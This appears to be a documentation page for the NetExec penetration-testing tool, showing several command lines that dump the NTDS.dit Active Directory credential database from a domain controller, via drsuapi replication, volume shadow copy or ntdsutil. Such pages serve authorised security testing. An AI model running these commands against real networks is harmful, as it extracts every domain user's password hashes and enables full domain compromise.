Dump NTDS.dit

Last updated 2 months ago

Was this helpful?

Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller

2 methods are available:   
(default) 	drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
						additional drsuapi calls to convert the resultant linked-lists into readable format  
			vss - Uses the Volume Shadow copy Service

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss

You can also DCSYNC with the computer account of the DC

There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil

Remember to play this music everytime you got DA

PreviousDump LSA NextDump LSASS

Last updated 2 months ago

Was this helpful?